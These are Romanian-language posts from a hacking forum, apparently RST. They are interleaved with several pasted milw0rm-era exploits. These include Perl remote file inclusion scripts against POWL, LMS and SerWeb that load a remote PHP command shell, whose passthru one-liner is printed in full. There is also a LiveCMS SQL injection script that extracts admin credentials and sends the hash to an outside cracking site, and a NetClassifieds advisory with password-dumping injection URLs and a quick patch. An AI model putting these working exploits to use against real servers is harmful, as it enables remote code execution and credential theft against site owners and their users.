kw3rln

imi place ideea templateului ! frumos .. ms

HEHE .. ! bravo si sper sa mai faci inca unul alaturi de noi

http://www.delorie.com/djgpp/compile/

microsoft word are optiunea sa le faci toate mici sau toate mari ! anyway ms de program

mersi Ras ! faci posturi de calitate in ultima vreme..simt ca o vine o marire de salar !

Site Adress: http://rstzone.net/forum/

da e interesant da pacat ca e facuta in graba .. cel mai interesant din revista o fost interviul cu OSHO care mi-o placut .. that`s all sa vedeti voi revista RST cand va fi gata in august cam pe atunci se anunta lansare .. o sa fie si printata si trimisa la membri de calitate rst

eu ieri am incercat si mi-a mers fara nici o problema cu cont normal ! la astea platite nustiu .. o sa incerc

is foarte vechi codurile de acolo

ban

require LWP::UserAgent; $proxyfile = $ARGV[1]; $url = $ARGV[0]; if(!$proxyfile || !$url) { print "USAGE: script.pl [url]http://www.site.com[/url] proxy_file.txt"; exit; } @useragents = ('Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1','Mozilla/4.0 (compatible; MSIE is not me; DAUMOA/1.0.1; DAUM Web Robot; Daum Communications Corp., Korea) ','Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/','Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck','Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)','Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck'); open(PROXY,$proxyfile); @proxies = <PROXY>; print "\n[] Script by Iron ([url]http://www.ironwarez.info[/url])"; print "\n[]Database (".$proxyfile.") contains ".scalar(@proxies)." proxies."; $succes = 0; $failed = 0; foreach $proxy(@proxies) { chomp($proxy); my $ua = LWP::UserAgent->new; $ua->timeout(30); $ua->env_proxy; $ua->agent(@data[int(rand(scalar(@data)))]); $ua->proxy('http', 'http://'.$proxy); my $response = $ua->get($url); if ($response->is_success) { print "\n[+]".$proxy." -> succes"; $succes++; } else { print "\n[-]".$proxy." -> failed"; $failed++; } } print "\n[Total] Succesful connections: ". $succes."\nFailed connections: ".$failed;

Application: NetClassifieds: -Free Edition -Standard Edition -Professional Edition -Premium Edition Web Site: http://www.scriptdevelopers.net/ Versions: all Platform: linux, windows Bug: multiple injection sql , xss , full path Fix Available: Yes ------------------------------------------------------- 1) Introduction 2) Bug 3) The Code 4) Proof of concept 5) Fix 6)Conclusion =========== 1) Introduction =========== "NetClassifieds Premium Edition has been built on the premise of making every classifieds site feel like it was custom written for the purpose for which it's being used. Automotive Sites, Horse Sites, Reality Sites, General Classifieds Sites or any other type of classifieds site you can think of will find a perfect match in NetClassifieds" ====== 2) Bug ====== injection sql , xss , full path =============== 3) Vulnerable code: =============== in Common.php line 310: function CCStrip($value) { if(get_magic_quotes_gpc() == 0) return $value; else return stripslashes($value); // ==> wtf... 0-o } ligne 350: function CCGetFromPost($parameter_name, $default_value) { global $HTTP_POST_VARS; $parameter_value = ""; if(isset($HTTP_POST_VARS[$parameter_name])) $parameter_value = CCStrip($HTTP_POST_VARS[$parameter_name]); else $parameter_value = $default_value; return $parameter_value; } line 365: function CCGetFromGet($parameter_name, $default_value) { global $HTTP_GET_VARS; $parameter_value = ""; if(isset($HTTP_GET_VARS[$parameter_name])) $parameter_value = CCStrip($HTTP_GET_VARS[$parameter_name]); else $parameter_value = $default_value; return $parameter_value; } nothing is filtred .... let's see how it goes in viewcat.php: line 63: include(RelativePath . "/Common.php"); line 519: $this->ds->Parameters["urlCatID"] = CCGetFromGet("CatID", ""); line 909: $catdb1 = new clsDBNetConnect; $catdb1->connect(); $newSQL1 = "SELECT cat_id FROM categories WHERE sub_cat_id='" . CCGetFromGet("CatID", "") . "'"; $incat = "'" . CCGetFromGet("CatID", "") . "'"; I wont past every line of this code , because EVERY parameter is vulnerable to sql injection , XSS , full path ... ===== 4)proof of concept ===== exemple of exploitation : 1) http://site.com/ViewCat.php?CatID=-8+union+select+1,email,3+from+users/* ==> ( Database error: Invalid SQL: SELECT name, sub_cat_id, cat_id FROM categories WHERE cat_id=username@mail.com ) 2)http://site.com/ViewCat.php?s_user_id='+union+select+user_password+from+users+where%20user_id=1/* ==> The value in field urls_user_id is not valid. (passwd_PLAIN_TEXT) // there's absolutly no encryption in this script for stored password , or sensitive data ... every input are vulnerable to XSS attacks ( there's maybe 40 inputs ... ) via mysql errors , php error , and via various unfiltred forms . ===== 5) Fix ===== scriptdevelopers has been advised , i dont think they will release any patch at the moment . here's my "quick patch" : 1) in Common.php: line 30 : ADD: ini_set(display_errors,"0"); ( in a production mode , no one needs to know your errors .. and this avoid xss via php error ) ligne 350: function CCGetFromPost // for every POST request avant : return $parameter_value; apres : return preg_replace('/[^a-z0-9]/i', '', $parameter_value); //only 0 to 9 and a to z caracters allowed line 365: function CCGetFromGet // for every GET request replace : return $parameter_value; BY return preg_replace('/[^a-z0-9]/i', '', $parameter_value); 2) in Mysql_db.php line 52 : var $Halt_On_Error = "yes"; ## "yes" (halt with message), "no" (ignore errors quietly), "report" (ignore errror, but spit a warning) set the value at "no" ( by default it's yes ) this will avoid juicy errors , such as table name and the complete query 3) imageresizer.php line 2: ADD : ini_set(display_errors,"0"); ( same reason as Common.php ) line 100 : replace : echo("<hr color='red'><font color='red'>$msg</font> file=".__FILE__."<hr color='red'>") BY echo("<hr color='red'><font color='red'>error while processing your request</font> <hr color='red'>"); ".__FILE__." show the full path, no one need to know where is located your script on the server . and usually a full path give the username for the ftp , or cpanel . ( /directory/your_user/www/file.php ) ===== 5) Conclusion ===== This script has not been develloped in a secure way, and it's dangerous to use it UNPATCHED regards laurent gaffie contact : laurent.gaffie@gmail.com # milw0rm.com [2007-06-22]

si ai uitat sa citesti regulile ! ban

zbeng deci ramane intalnirea noastra tot la ora 12 nu? .. tufisu 13 din park yeah? i luv ya ! muah

o sa aiba RST-ul unu .. da ma tem ca o sa-l pun pe un PII-PIII si banda mica.. nu de alta da sa nu-l foloseasca la altceva just hack and root it

bravo ! vurnerabilitatea aia care mi-ai aratato presupun good job baieti

0day .. inca nepublicat nicaieri #!/usr/bin/perl # # POWL - 0.94 - Remote File Inclusion Exploit # # Url: [url]http://switch.dl.sourceforge.net/sourceforge/powl/powl_ontowiki-0.94.zip[/url] # # Exploit: # [url]http://site.com/[/url][path]/plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=[Evil_Script>:] # # (c)oded and f0und3d by kw3rln <office[at]rosecuritygroup[dot]net> # # Romanian Security Team .: [url]hTTp://RSTZONE.NET[/url] :. # # # why i publish this lame bugs? just boring all day..drinking beer.. i will publish sqli too but rfi`s are # more searched than never # # greetz to all RST [rstzone.net] MEMBERZ # # Fuckz: GM [h4cky0u] -[bigest nub] use LWP::Simple; print "...........................[RST]...............................\n"; print ". .\n"; print ". SerWeb 0.9.4- Remote FIle Inclusion .\n"; print ". .\n"; print "...............................................................\n"; print ". Romanian Security Team -> [url]hTTp://RSTZONE.NET[/url] .\n"; print ". [c]oded by Kw3rLN - [email]office@rosecuritygroup.net[/email] .\n"; print "...............................................................\n\n"; my $kw3,$path,$shell,$conexiune,$cmd,$data ; if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);} $path = $ARGV[0]; chomp($path); $shell = $ARGV[1]; chomp($shell); $path = $path."/plugins/widgets/htmledit/htmledit.php"; sub usage(){ print "Usage : perl $0 host/path http://site.com/cmd.txt\n\n"; print "Example : perl $0 [url]http://127.0.0.1[/url] http://site.com/cmd.txt\n\n"; print 'Shell : <?php ob_clean();ini_set("max_execution_time",0);passthru($_GET["cmd"]);die;?>'; } while () { print "[kw3rln].[rst] :~\$ "; chomp($cmd=<STDIN>); if ($cmd eq "exit") { exit(0);} $kw3 = $path."?_POWL[installPath]=".$shell."?&cmd=".$cmd; if ($cmd eq "") { print "Enter your command !\n"; } else { $data=get($kw3); print $data ; } }

http://milw0rm.com/exploits/4086 #!/usr/bin/perl # # LMS - LAN Management System 1.9.6 - RFI # # Risk : High (Remote Code Execution) # # Url: [url]http://www.lms.org.pl/download/1.9/lms-1.9.6.tar.gz[/url] # # Exploit: # [url]http://site.com/[/url][path]/lib/language.php?_LIB_DIR=[Evil_Script] # # (c)oded and f0und3d by Kw3[R]Ln <office[at]rosecuritygroup[dot]net> # # Romanian Security Team .: [url]hTTp://RSTZONE.NET[/url] :. # # # greetz to all RST [rstzone.net] MEMBERZ, Nemessis, Slick, str0ke, SpiridusuCaddy, zbeng, ENCODED, # Death, Ciupercutza [LUV TEAM] and all i forgot ! # # Fuckz: GM [h4cky0u] -[bigest nub] use LWP::Simple; print "...........................[RST]...............................\n"; print ". .\n"; print ". LMS - LAN Management System 1.9.6 - RFI .\n"; print ". .\n"; print "...............................................................\n"; print ". Romanian Security Team -> [url]hTTp://RSTZONE.NET[/url] .\n"; print ". [c]oded by Kw3rLN - [email]office@rosecuritygroup.net[/email] .\n"; print "...............................................................\n\n"; my $kw3,$path,$shell,$conexiune,$cmd,$data ; if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);} $path = $ARGV[0]; chomp($path); $shell = $ARGV[1]; chomp($shell); $path = $path."/lib/language.php"; sub usage(){ print "Usage : perl $0 host/path http://site.com/cmd.txt\n\n"; print "Example : perl $0 [url]http://127.0.0.1[/url] http://site.com/cmd.txt\n\n"; print 'Shell : <?php ob_clean();ini_set("max_execution_time",0);passthru($_GET["cmd"]);die;?>'; } while () { print "[kw3rln].[rst] :~\$ "; chomp($cmd=<STDIN>); if ($cmd eq "exit") { exit(0);} $kw3 = $path."?_LIB_DIR=".$shell."?&cmd=".$cmd; if ($cmd eq "") { print "Enter your command !\n"; } else { $data=get($kw3); print $data ; } } # milw0rm.com [2007-06-20]

http://milw0rm.com/exploits/4089 #!/usr/bin/perl # # SerWeb 0.9.4- Remote FIle Inclusion # # This software, serweb, is a web interface for self-provisioning # of users of SER SIP Server ([url]http://www.iptel.org/ser/[/url]) # # Url: [url]http://ftp.iptel.org/pub/ser/0.9.6/contrib/serweb-0.9.4.tar.gz[/url] # # Exploit: # [url]http://site.com/[/url][path]/load_lang.php?_SERWEB[serwebdir]=[Evil_Script] # # (c)oded and f0und3d by Kw3[R]Ln <office[at]rosecuritygroup[dot]net> # # Romanian Security Team .: [url]hTTp://RSTZONE.NET[/url] :. # # # greetz to all RST [rstzone.net] MEMBERZ # # Fuckz: GM [h4cky0u] -[bigest nub], me use LWP::Simple; print "...........................[RST]...............................\n"; print ". .\n"; print ". SerWeb 0.9.4- Remote FIle Inclusion .\n"; print ". .\n"; print "...............................................................\n"; print ". Romanian Security Team -> [url]hTTp://RSTZONE.NET[/url] .\n"; print ". [c]oded by Kw3rLN - [email]office@rosecuritygroup.net[/email] .\n"; print "...............................................................\n\n"; my $kw3,$path,$shell,$conexiune,$cmd,$data ; if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);} $path = $ARGV[0]; chomp($path); $shell = $ARGV[1]; chomp($shell); $path = $path."/load_lang.php"; sub usage(){ print "Usage : perl $0 host/path http://site.com/cmd.txt\n\n"; print "Example : perl $0 [url]http://127.0.0.1[/url] http://site.com/cmd.txt\n\n"; print 'Shell : <?php ob_clean();ini_set("max_execution_time",0);passthru($_GET["cmd"]);die;?>'; } while () { print "[kw3rln].[rst] :~\$ "; chomp($cmd=<STDIN>); if ($cmd eq "exit") { exit(0);} $kw3 = $path."?_SERWEB[serwebdir]=".$shell."?&cmd=".$cmd; if ($cmd eq "") { print "Enter your command !\n"; } else { $data=get($kw3); print $data ; } } # milw0rm.com [2007-06-21]

you`re funny Ras odata ce invata PHP normal ca invata si XSS ce legatura are php cu xss-u ?

pai la nivel nu va aparea intotdeauna n00b [inca nu-i implementata functia].. e o idee care merge si care face sa existe concurenta intre useri ,

#!/usr/bin/perl ############################################################################################## # ___ ___ _ # / _ \ / _ \ | | # __ _| | | | | | |_ __ ___ _ __ ___| |_ # / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __| # | (_| | |_| | |_| | | | \__ \_| | | | __/ |_ # \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__| # __/ | # |___/ ############################################################################################### #INFO: #Program Title ################################################################################ #LiveCMS <= 3.4 SQL Injection, Absolute Path Disclosure, XSS Injection, Arbitrary File Upload # #Description ################################################################################## #This is a free CMS system. # #Script Download ############################################################################## #[url]http://sourceforge.net/project/downloading.php?group_id=78735&use_mirror=ufpr&filename=livecms-3.4.tar.gz&12060460[/url] #[url]http://livecms.com[/url] # #Original Advisory ############################################################################# #[url]http://www.g00ns-forum.net/showthread.php?t=9350[/url] # #Exploit ####################################################################################### #credz to Vipsta and Clorox for vulnerability #[c]ode by TrinTiTTY (2007) [url]www.g00ns.net[/url] #shoutz: z3r0, milf, blackhill, godxcel, murderskillz, katalyst, SyNiCaL, OD, pr0be, rezen, str0ke, #fish, rey, canuck, c0ma, sick, trin, a59, seven, fury, <S>, Bernard, and everyone else at g00ns.net # #Details ####################################################################################### #APD: The absolute path is disclosed in a mysql error when categoria.php's paramater cid is queried with a non-defined #variable. example: categoria.php?cid=' #XSS: Article names are not properly santised, a user could insert malicious javascript #AFU: Articles can have a small image that is uploaded with them, however LiveCMS fails to restrict what file types #can be uploaded. A user could upload a malicious script with this method and compromise the server. #GoogleDork: "powered by livecms" # ################################################################################################ #++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++# # LiveCMS <= 3.3 [ categoria.php ] # # ] Remote SQL Injection [ # # # # [c]ode by TrinTiTTY [at] g00ns.net # # Vulnerability by Vipsta and Clorox # # # # # # [irc.g00ns.net] [[url]www.g00ns.net][/url] [ts.g00ns.net] # #++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++# use LWP; $host = @ARGV[0]; $ua = LWP::UserAgent->new; my $uject ='categoria.php?cid=1%20UNION%20ALL%20SELECT%201,2,user,4,5,6%20FROM%20live_admin%20WHERE%20userid=1/*'; my $pject ='categoria.php?cid=1%20UNION%20ALL%20SELECT%201,2,pass,4,5,6%20FROM%20live_admin%20WHERE%20userid=1/*'; if (@ARGV < 1){&top( );&usage( )} elsif ($host =~ /http:\/\//){print"\n\n [-] Don't use http:// in host\n";exit( 0 );} else { &getUser( ) } sub getUser( ) { system("color 4"); &top( ); print "\n [~] Retrieving admin username\n"; $nameres = $ua->get("http://$host/$uject"); $namecon = $nameres->content; if ($namecon =~ /<td>(.*)a href=\"(.*)\"(.*)>(.*)<\/a><\/td>/gmi) { $user = $4; print "\n [+] Admin user retrieved: $user\n"; print "\n [~] Retrieving password for $user\n"; getPass( ) } else { print "\n [-] Unable to retrieve admin username\n"; print "\n [~] Retrieving password\n"; getPass( ) } } sub getPass( ) { $passres = $ua->get("http://$host/$pject"); $passCon = $passres->content; if ($passCon =~ /<td>(.*)a href=\"(.*)\"(.*)>([a-f0-9]{32})<\/a><\/td>/gmi) { $pass = $4; print "\n [+] Admin password retrieved: $pass\n"; &resolveHash($pass); system("color 7"); } else { print "\n [-] Unable to retrieve admin password\n"; system("color 7"); exit(0); } } sub resolveHash($) { print "\n [~] Attempting to resolve hash\n"; $hashget = LWP::UserAgent->new; #thx gdata $resp = $hashget->get("http://gdataonline.com/qkhash.php?mode=txt&hash=$_[0]"); # checks gdata for hash $hashans = $resp->content; if ($hashans =~ m\width="35%">[b]([ -_a-z0-9.*?&<>/""]{1,25})[/b]</td>\){ $crack = $1; print "\n [+] Password hash resolved: $crack\n"; system("color 7"); exit(0); } else { print "\n [-] Couldn't resolve hash\n"; system("color 7"); exit(0); } } sub top( ) { print q { ################################################################## # LiveCMS <= 3.3 [ categoria.php ] # # ] Remote SQL Injection [ # # # # [c]ode by TrinTiTTY [at] g00ns.net # # Vulnerability by Vipsta and Clorox # ################################################################## } } sub usage( ) { print "\n Usage: perl livecms33.pl <host>\n"; print "\n Example: perl livecms33.pl www.example.com/path\n\n"; exit(0); } # milw0rm.com [2007-06-20]

ms mult! interesant

tot copil copac a ramas ! mi mila de el

nos renunta la cutite si dute la topoare parca te vad